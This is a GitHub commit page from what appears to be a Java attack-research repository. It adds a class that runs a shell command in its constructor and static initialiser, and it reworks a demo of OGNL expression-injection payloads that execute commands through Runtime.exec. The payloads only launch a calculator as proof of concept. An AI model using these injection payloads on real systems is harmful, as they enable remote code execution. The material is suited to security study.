Skip to content

Commit 7fe48dc

Browse files
WhoopsunixWhoopsunix
committed
add JDBC Attack :)
1 parent a29e87d commit 7fe48dc

37 files changed

Lines changed: 279 additions & 367 deletions

File tree

Expression/OGNLAttack/src/main/java/org/example/Exec.java

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
package org.example;
2+
3+
/**
4+
* @author Whoopsunix
5+
*/
6+
public class Exec {
7+
public Exec() {
8+
try {
9+
System.out.println("Exec");
10+
Runtime.getRuntime().exec("open -a Calculator.app");
11+
} catch (Exception e) {
12+
}
13+
}
14+
15+
static {
16+
try {
17+
System.out.println("static Exec");
18+
Runtime.getRuntime().exec("open -a Calculator.app");
19+
} catch (Exception e) {
20+
}
21+
}
22+
}

Expression/OGNLAttack/src/main/java/org/example/OGNL.java

Lines changed: 13 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -9,17 +9,14 @@
99
public class OGNL {
1010

1111
public static void main(String[] args) {
12+
new OGNL().getValueDemo();
13+
}
14+
15+
public void getValueDemo(){
1216
/**
1317
* 无回显 get触发
1418
*/
1519
String baseGetPayload = "@java.lang.Runtime@getRuntime().exec('open -a Calculator.app')";
16-
// ognlGetValue(baseGetPayload);
17-
18-
/**
19-
* 无回显 set触发
20-
*/
21-
String baseSetPayload = "(@java.lang.Runtime@getRuntime().exec(\'open -a Calculator.app\'))(a)(b)";
22-
// ognlSetValue(baseSetPayload);
2320

2421
/**
2522
* Ognl解析后,存在直接打印的情况
@@ -64,10 +61,17 @@ public static void main(String[] args) {
6461
* todo 类加载
6562
*/
6663

67-
6864
Object obj = ognlGetValue(sleep);
65+
6966
System.out.println(obj);
70-
// ognlSetValue(jsPayloadNormalSet);
67+
}
68+
69+
public void setValueDemo(){
70+
/**
71+
* 无回显 set触发
72+
*/
73+
String baseSetPayload = "(@java.lang.Runtime@getRuntime().exec(\'open -a Calculator.app\'))(a)(b)";
74+
ognlSetValue(baseSetPayload);
7175
}
7276

7377
/**

JDBCAttack/DerbyAttack/pom.xml

Lines changed: 0 additions & 47 deletions
This file was deleted.

JDBCAttack/H2Attack/pom.xml

Lines changed: 0 additions & 63 deletions
This file was deleted.

JDBCAttack/H2Attack/src/main/java/com/example/h2attack/H2AttackApplication.java

Lines changed: 0 additions & 13 deletions
This file was deleted.

JDBCAttack/H2Attack/src/main/resources/application.yml

Lines changed: 0 additions & 6 deletions
This file was deleted.

JDBCAttack/IBMDB2Attack/pom.xml

Lines changed: 0 additions & 24 deletions
This file was deleted.

JDBCAttack/ModeShapeAttack/pom.xml

Lines changed: 0 additions & 23 deletions
This file was deleted.

JDBCAttack/MysqlAttack/pom.xml

Lines changed: 0 additions & 50 deletions
This file was deleted.

JDBCAttack/PostgreSQLAttack/pom.xml

Lines changed: 0 additions & 46 deletions
This file was deleted.

0 commit comments

Comments
 (0)